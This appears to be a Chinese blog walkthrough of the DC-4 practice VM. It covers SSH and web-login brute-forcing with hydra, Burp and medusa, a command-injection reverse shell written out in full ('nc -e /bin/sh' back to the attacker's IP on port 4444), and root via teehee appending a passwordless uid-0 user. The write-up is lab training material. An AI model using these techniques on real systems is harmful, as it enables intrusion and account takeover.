ok,今天我们来学习第四个靶机!!!
1.实验环境
攻击机:kali2023.2
靶机:DC-4
2.1扫描网段
2.2扫描靶机端口
这里发现开启了两个端口,一个22 一个80,首先我想到的试一下能不能爆破一下22端口!
3.1ssh爆破
我用的是hydra ,然后用的是kali自带的字典,随便试一下!
3.2爆破结果
这里我没爆破出来,然后我就先不看他这个 22 端口了,因为爆破这东西,一是费时间,二是靠运气,所以我想先试试 80 端口,看看有什么,实在不行再搞个大字典爆破一下!
4.1查看对方80端口
发现是一个admin的登陆界面,我想到的是抓一下包,然后看看能不能用bp爆破出来密码!
4.2抓包,然后bp爆破
然后我们看能不能爆破出来!其实经过前面三个靶场的经验,bp爆破出来的可能性还是蛮大的,所以这边稍微等一下,我用的是一个2000多的字典!!
这里的话已经成功爆破出来了,密码不难,是 happy !!!
4.3登录寻找线索
登上来是这样,可以看到应该会有一些,,命令,点开看一下!
这里可以执行一些命令语句,那我们可以尝试一下通过抓包,上传一些恶意的命令,看能不能拿到一个shell !!!
4.4上传军刀,反弹shell
这个是我搜出来的使用方式,咱们试一下!!!先用bp抓包,然后修改命令,提交上去,当然我们首先要在kali开一个端口监听,这里我开的是4444!
然后我们点run抓包以后会跳到这个界面
我们把下面的命令修改一下,修改成 nc+-e+/bin/sh+192.168.6.137+4444 ,这里的空格我们用加号代替了,这样才能成功上传,改完以后我们点 forward 放行即可!
4.5拿到一个低权限的shell
这样我们就拿到了,但是这个权限很低,我们要想办法提权!!!
5.1美化一下这个命令行
5.2尝试在这个shell找点线索
这里找到三个普通用户,肯定是作者留给我们的线索,想办法看看能不能找到些什么东西!
5.3通过三个普通用户,看能不能发现什么
charles里面是空的,但是jim里面有不少东西!!!
旧密码,jim这个账户的密码很用可能就在里面,然后我们回到最初的ssh爆破那里。用jim当用户名,这个文件里的东西当字典,重新爆破一下!
5.4使用medusa爆破jim用户
这里我动了一个小脑筋,我觉得如果密码真的在里面的话,很有可能密码被藏到下面一点了,所以我复制密码的时候 用了 tac 反转一下顺序,或许可以省点时间!!!
果然不出所料,反转以后的第31个成功了,没有反转的话更费时间一点,这个小技巧大家爆破的时候也可以试试!!!
5.5登录jim用户寻找线索
我们发现 root 给jim发了邮件,然后我们去邮箱里看看有没有什么东西!!!
找到了charles 的密码 我们登陆一下!!!
5.6登录Charles寻找线索
charles里面啥也没有,然后发现了这玩意儿
八成是用这个提权了!!!
6.1teehee提权
我查了一下,就是利用这个teehee追加一个没有密码的uid为0的root用户,然后登陆这个用户就可以提权!!!
ok到这里就结束了!!!
7.稍微总结一下
首先就是爆破是一种很简单有效的方式,其次拿到普通用户权限后第一时间看看能不能用suid或者sudo提权,提权方式千千万万,今天又学到一个 teehee提权 !!!慢慢积累就会有提升!!!
~~~持续更新中
2376
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
